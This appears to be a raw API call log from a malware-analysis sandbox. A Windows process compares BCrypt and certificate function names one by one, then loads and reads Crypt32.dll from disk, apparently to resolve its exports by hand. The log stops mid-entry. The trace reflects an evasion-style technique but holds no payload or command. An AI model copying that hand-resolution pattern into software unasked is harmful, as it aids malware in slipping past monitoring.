lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptAddContextFunctionProvider") returned 1 [0252.042] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0252.042] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptConfigureContext") returned 1 [0252.042] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptConfigureContextFunction") returned 1 [0252.042] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptCreateContext") returned 1 [0252.043] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptCreateHash") returned 1 [0252.043] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptCreateMultiHash") returned 1 [0252.043] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptDecrypt") returned 1 [0252.043] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptDeleteContext") returned 1 [0252.043] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptDeriveKey") returned 1 [0252.043] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptDeriveKeyCapi") returned 0 [0252.043] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptAddContextFunction") returned 1 [0252.043] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptAddContextFunctionProvider") returned 1 [0252.043] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0252.043] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptConfigureContext") returned 1 [0252.043] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptConfigureContextFunction") returned 1 [0252.043] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptCreateContext") returned 1 [0252.043] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptCreateHash") returned 1 [0252.043] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptCreateMultiHash") returned 1 [0252.043] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptDecrypt") returned 1 [0252.043] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptDeleteContext") returned 1 [0252.043] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptDeriveKey") returned 1 [0252.043] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptDeriveKeyCapi") returned 1 [0252.043] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptDeriveKeyPBKDF2") returned 0 [0252.043] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptAddContextFunction") returned 1 [0252.043] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptAddContextFunctionProvider") returned 1 [0252.043] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0252.043] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptConfigureContext") returned 1 [0252.043] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptConfigureContextFunction") returned 1 [0252.043] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptCreateContext") returned 1 [0252.043] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptCreateHash") returned 1 [0252.043] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptCreateMultiHash") returned 1 [0252.044] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptDecrypt") returned 1 [0252.044] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptDeleteContext") returned 1 [0252.044] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptDeriveKey") returned 1 [0252.044] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptDeriveKeyCapi") returned 1 [0252.044] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptDeriveKeyPBKDF2") returned 1 [0252.044] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptDestroyHash") returned 0 [0252.044] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptAddContextFunction") returned 1 [0252.044] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptAddContextFunctionProvider") returned 1 [0252.044] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0252.044] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptConfigureContext") returned 1 [0252.044] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptConfigureContextFunction") returned 1 [0252.044] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptCreateContext") returned 1 [0252.044] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptCreateHash") returned 1 [0252.044] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptCreateMultiHash") returned 1 [0252.044] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptDecrypt") returned 1 [0252.044] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptDeleteContext") returned 1 [0252.044] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptDeriveKey") returned 1 [0252.044] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptDeriveKeyCapi") returned 1 [0252.044] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptDeriveKeyPBKDF2") returned 1 [0252.044] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptDestroyHash") returned 1 [0252.044] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptDestroyKey") returned 0 [0252.044] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptAddContextFunction") returned 1 [0252.044] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptAddContextFunctionProvider") returned 1 [0252.044] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0252.044] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptConfigureContext") returned 1 [0252.044] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptConfigureContextFunction") returned 1 [0252.044] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptCreateContext") returned 1 [0252.045] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptCreateHash") returned 1 [0252.045] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptCreateMultiHash") returned 1 [0252.045] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptDecrypt") returned 1 [0252.045] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptDeleteContext") returned 1 [0252.045] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptDeriveKey") returned 1 [0252.045] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptDeriveKeyCapi") returned 1 [0252.045] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptDeriveKeyPBKDF2") returned 1 [0252.045] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptDestroyHash") returned 1 [0252.045] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptDestroyKey") returned 1 [0252.045] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptDestroySecret") returned 0 [0252.045] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptAddContextFunction") returned 1 [0252.045] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptAddContextFunctionProvider") returned 1 [0252.045] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0252.045] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptConfigureContext") returned 1 [0252.045] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptConfigureContextFunction") returned 1 [0252.045] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptCreateContext") returned 1 [0252.045] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptCreateHash") returned 1 [0252.045] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptCreateMultiHash") returned 1 [0252.045] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptDecrypt") returned 1 [0252.045] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptDeleteContext") returned 1 [0252.045] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptDeriveKey") returned 1 [0252.045] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptDeriveKeyCapi") returned 1 [0252.045] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptDeriveKeyPBKDF2") returned 1 [0252.045] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptDestroyHash") returned 1 [0252.045] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptDestroyKey") returned 1 [0252.045] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptDestroySecret") returned 1 [0252.045] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptDuplicateHash") returned 0 [0252.046] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptAddContextFunction") returned 1 [0252.046] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptAddContextFunctionProvider") returned 1 [0252.046] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0252.046] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptConfigureContext") returned 1 [0252.046] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptConfigureContextFunction") returned 1 [0252.046] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptCreateContext") returned 1 [0252.046] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptCreateHash") returned 1 [0252.046] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptCreateMultiHash") returned 1 [0252.046] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptDecrypt") returned 1 [0252.046] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptDeleteContext") returned 1 [0252.046] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptDeriveKey") returned 1 [0252.046] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptDeriveKeyCapi") returned 1 [0252.046] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptDeriveKeyPBKDF2") returned 1 [0252.046] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptDestroyHash") returned 1 [0252.046] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptDestroyKey") returned 1 [0252.046] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptDestroySecret") returned 1 [0252.046] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptDuplicateHash") returned 1 [0252.046] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptDuplicateKey") returned 0 [0252.046] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptAddContextFunction") returned 1 [0252.046] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptAddContextFunctionProvider") returned 1 [0252.046] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0252.046] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptConfigureContext") returned 1 [0252.046] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptConfigureContextFunction") returned 1 [0252.046] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptCreateContext") returned 1 [0252.046] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptCreateHash") returned 1 [0252.046] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptCreateMultiHash") returned 1 [0252.046] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptDecrypt") returned 1 [0252.046] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptDeleteContext") returned 1 [0252.046] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptDeriveKey") returned 1 [0252.046] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptDeriveKeyCapi") returned 1 [0252.047] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptDeriveKeyPBKDF2") returned 1 [0252.047] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptDestroyHash") returned 1 [0252.047] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptDestroyKey") returned 1 [0252.047] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptDestroySecret") returned 1 [0252.047] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptDuplicateHash") returned 1 [0252.047] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptDuplicateKey") returned 1 [0252.047] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptEncrypt") returned 0 [0252.047] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptAddContextFunction") returned 1 [0252.047] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptAddContextFunctionProvider") returned 1 [0252.047] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0252.047] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptConfigureContext") returned 1 [0252.047] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptConfigureContextFunction") returned 1 [0252.047] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptCreateContext") returned 1 [0252.047] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptCreateHash") returned 1 [0252.047] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptCreateMultiHash") returned 1 [0252.047] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptDecrypt") returned 1 [0252.047] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptDeleteContext") returned 1 [0252.047] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptDeriveKey") returned 1 [0252.047] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptDeriveKeyCapi") returned 1 [0252.047] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptDeriveKeyPBKDF2") returned 1 [0252.047] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptDestroyHash") returned 1 [0252.047] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptDestroyKey") returned 1 [0252.047] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptDestroySecret") returned 1 [0252.047] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptDuplicateHash") returned 1 [0252.047] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptDuplicateKey") returned 1 [0252.047] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptEncrypt") returned 1 [0252.047] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptEnumAlgorithms") returned 0 [0252.048] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptAddContextFunction") returned 1 [0252.048] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptAddContextFunctionProvider") returned 1 [0252.048] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0252.048] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptConfigureContext") returned 1 [0252.048] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptConfigureContextFunction") returned 1 [0252.048] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptCreateContext") returned 1 [0252.048] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptCreateHash") returned 1 [0252.048] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptCreateMultiHash") returned 1 [0252.048] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptDecrypt") returned 1 [0252.048] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptDeleteContext") returned 1 [0252.048] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptDeriveKey") returned 1 [0252.048] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptDeriveKeyCapi") returned 1 [0252.048] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptDeriveKeyPBKDF2") returned 1 [0252.048] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptDestroyHash") returned 1 [0252.048] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptDestroyKey") returned 1 [0252.048] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptDestroySecret") returned 1 [0252.048] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptDuplicateHash") returned 1 [0252.048] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptDuplicateKey") returned 1 [0252.049] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptEncrypt") returned 1 [0252.049] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptEnumAlgorithms") returned 1 [0252.049] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptEnumContextFunctionProviders") returned 0 [0252.049] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptAddContextFunction") returned 1 [0252.180] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptAddContextFunctionProvider") returned 1 [0252.180] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0252.180] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptConfigureContext") returned 1 [0252.181] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptConfigureContextFunction") returned 1 [0252.181] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptCreateContext") returned 1 [0252.181] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptCreateHash") returned 1 [0252.181] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptCreateMultiHash") returned 1 [0252.181] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptDecrypt") returned 1 [0252.181] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptDeleteContext") returned 1 [0252.181] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptDeriveKey") returned 1 [0252.181] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptDeriveKeyCapi") returned 1 [0252.181] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptDeriveKeyPBKDF2") returned 1 [0252.181] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptDestroyHash") returned 1 [0252.181] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptDestroyKey") returned 1 [0252.181] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptDestroySecret") returned 1 [0252.181] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptDuplicateHash") returned 1 [0252.181] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptDuplicateKey") returned 1 [0252.183] GetProcessHeap () returned 0x430000 [0252.183] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2c92010 | out: hHeap=0x430000) returned 1 [0252.183] GetProcessHeap () returned 0x430000 [0252.183] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x10) returned 0x449700 [0252.184] LoadLibraryA (lpLibFileName="Crypt32.dll") returned 0x7ffc5c190000 [0252.191] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0252.191] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0252.192] GetModuleFileNameA (in: hModule=0x7ffc5c190000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\Crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll")) returned 0x1f [0252.192] CreateFileA (lpFileName="C:\\Windows\\system32\\Crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0252.193] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0252.193] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0252.193] GetFileSizeEx (in: hFile=0x160, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=1847520) returned 1 [0252.193] GetProcessHeap () returned 0x430000 [0252.193] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x1c30e0) returned 0x4056040 [0252.197] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0252.197] ReadFile (in: hFile=0x160, lpBuffer=0x4056040, nNumberOfBytesToRead=0x1c30e0, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x4056040*, lpNumberOfBytesRead=0x14f5a4*=0x1c30e0, lpOverlapped=0x0) returned 1 [0252.335] CloseHandle (hObject=0x160) returned 1 [0252.335] lstrcmpA (lpString1="CertAddCRLContextToStore", lpString2="CertAddCRLContextToStore") returned 0 [0252.335] lstrcmpA (lpString1="CertAddCRLLinkToStore", lpString2="CertAddCRLContextToStore") returned 1 [0252.335] lstrcmpA (lpString1="CertAddCRLLinkToStore", lpString2="CertAddCRLLinkToStore") returned 0 [0252.335] lstrcmpA (lpString1="CertAddCTLContextToStore", lpString2="CertAddCRLContextToStore") returned 1 [0252.335] lstrcmpA (lpString1="CertAddCTLContextToStore", lpString2="CertAddCRLLinkToStore") returned 1 [0252.335] lstrcmpA (lpString1="CertAddCTLContextToStore", lpString2="CertAddCTLContextToStore") returned 0 [0252.335] lstrcmpA (lpString1="CertAddCTLLinkToStore", lpString2="CertAddCRLContextToStore") returned 1 [0252.335] lstrcmpA (lpString1="CertAddCTLLinkToStore", lpString2="CertAddCRLLinkToStore") returned 1 [0252.335] lstrcmpA (lpString1="CertAddCTLLinkToStore", lpString2="CertAddCTLContextToStore") returned 1 [0252.335] lstrcmpA (lpString1="CertAddCTLLinkToStore", lpString2="CertAddCTLLinkToStore") returned 0 [0252.335] lstrcmpA (lpString1="CertAddCertificateContextToStore", lpString2="CertAddCRLContextToStore") returned -1 [0252.335] lstrcmpA (lpString1="CertAddCertificateContextToStore", lpString2="CertAddCRLLinkToStore") returned -1 [0252.336] lstrcmpA (lpString1="CertAddCertificateContextToStore", lpString2="CertAddCTLContextToStore") returned -1 [0252.336] lstrcmpA (lpString1="CertAddCertificateContextToStore", lpString2="CertAddCTLLinkToStore") returned -1 [0252.336] lstrcmpA (lpString1="CertAddCertificateContextToStore", lpString2="CertAddCertificateContextToStore") returned 0 [0252.336] lstrcmpA (lpString1="CertAddCertificateLinkToStore", lpString2="CertAddCRLContextToStore") returned -1 [0252.336] lstrcmpA (lpString1="CertAddCertificateLinkToStore", lpString2="CertAddCRLLinkToStore") returned -1 [0252.336] lstrcmpA (lpString1="CertAddCertificateLinkToStore", lpString2="CertAddCTLContextToStore") returned -1 [0252.336] lstrcmpA (lpString1="CertAddCertificateLinkToStore", lpString2="CertAddCTLLinkToStore") returned -1 [0252.336] lstrcmpA (lpString1="CertAddCertificateLinkToStore", lpString2="CertAddCertificateContextToStore") returned 1 [0252.336] lstrcmpA (lpString1="CertAddCertificateLinkToStore", lpString2="CertAddCertificateLinkToStore") returned 0 [0252.336] lstrcmpA (lpString1="CertAddEncodedCRLToStore", lpString2="CertAddCRLContextToStore") returned 1 [0252.336] lstrcmpA (lpString1="CertAddEncodedCRLToStore", lpString2="CertAddCRLLinkToStore") returned 1 [0252.336] lstrcmpA (lpString1="CertAddEncodedCRLToStore", lpString2="CertAddCTLContextToStore") returned 1 [0252.336] lstrcmpA (lpString1="CertAddEncodedCRLToStore", lpString2="CertAddCTLLinkToStore") returned 1 [0252.336] lstrcmpA (lpString1="CertAddEncodedCRLToStore", lpString2="CertAddCertificateContextToStore") returned 1 [0252.336] lstrcmpA (lpString1="CertAddEncodedCRLToStore", lpString2="CertAddCertificateLinkToStore") returned 1 [0252.336] lstrcmpA (lpString1="CertAddEncodedCRLToStore", lpString2="CertAddEncodedCRLToStore") returned 0 [0252.336] lstrcmpA (lpString1="CertAddEncodedCTLToStore", lpString2="CertAddCRLContextToStore") returned 1 [0252.336] lstrcmpA (lpString1="CertAddEncodedCTLToStore", lpString2="CertAddCRLLinkToStore") returned 1 [0252.336] lstrcmpA (lpString1="CertAddEncodedCTLToStore", lpString2="CertAddCTLContextToStore") returned 1 [0252.336] lstrcmpA (lpString1="CertAddEncodedCTLToStore", lpString2="CertAddCTLLinkToStore") returned 1 [0252.336] lstrcmpA (lpString1="CertAddEncodedCTLToStore", lpString2="CertAddCertificateContextToStore") returned 1 [0252.336] lstrcmpA (lpString1="CertAddEncodedCTLToStore", lpString2="CertAddCertificateLinkToStore") returned 1 [0252.336] lstrcmpA (lpString1="CertAddEncodedCTLToStore", lpString2="CertAddEncodedCRLToStore") returned 1 [0252.336] lstrcmpA (lpString1="CertAddEncodedCTLToStore", lpString2="CertAddEncodedCTLToStore") returned 0 [0252.336] lstrcmpA (lpString1="CertAddEncodedCertificateToStore", lpString2="CertAddCRLContextToStore") returned 1 [0252.336] lstrcmpA (lpString1="CertAddEncodedCertificateToStore", lpString2="CertAddCRLLinkToStore") returned 1 [0252.336] lstrcmpA (lpString1="CertAddEncodedCertificateToStore", lpString2="CertAddCTLContextToStore") returned 1 [0252.336] lstrcmpA (lpString1="CertAddEncodedCertificateToStore", lpString2="CertAddCTLLinkToStore") returned 1 [0252.336] lstrcmpA (lpString1="CertAddEncodedCertificateToStore", lpString2="CertAddCertificateContextToStore") returned 1 [0252.337] lstrcmpA (lpString1="CertAddEncodedCertificateToStore", lpString2="CertAddCertificateLinkToStore") returned 1 [0252.337] lstrcmpA (lpString1="CertAddEncodedCertificateToStore", lpString2="CertAddEncodedCRLToStore") returned -1 [0252.337] lstrcmpA (lpString1="CertAddEncodedCertificateToStore", lpString2="CertAddEncodedCTLToStore") returned -1 [0252.337] lstrcmpA (lpString1="CertAddEncodedCertificateToStore", lpString2="CertAddEncodedCertificateToStore") returned 0 [0252.337] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreA", lpString2="CertAddCRLContextToStore") returned 1 [0252.337] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreA", lpString2="CertAddCRLLinkToStore") returned 1 [0252.337] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreA", lpString2="CertAddCTLContextToStore") returned 1 [0252.337] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreA", lpString2="CertAddCTLLinkToStore") returned 1 [0252.337] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreA", lpString2="CertAddCertificateContextToStore") returned 1 [0252.337] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreA", lpString2="CertAddCertificateLinkToStore") returned 1 [0252.337] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreA", lpString2="CertAddEncodedCRLToStore") returned -1 [0252.337] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreA", lpString2="CertAddEncodedCTLToStore") returned -1 [0252.337] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreA", lpString2="CertAddEncodedCertificateToStore") returned 1 [0252.337] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreA", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 0 [0252.337] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddCRLContextToStore") returned 1 [0252.337] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddCRLLinkToStore") returned 1 [0252.337] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddCTLContextToStore") returned 1 [0252.337] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddCTLLinkToStore") returned 1 [0252.337] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddCertificateContextToStore") returned 1 [0252.337] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddCertificateLinkToStore") returned 1 [0252.337] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddEncodedCRLToStore") returned -1 [0252.337] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddEncodedCTLToStore") returned -1 [0252.337] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddEncodedCertificateToStore") returned 1 [0252.337] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0252.337] lstrcmpA 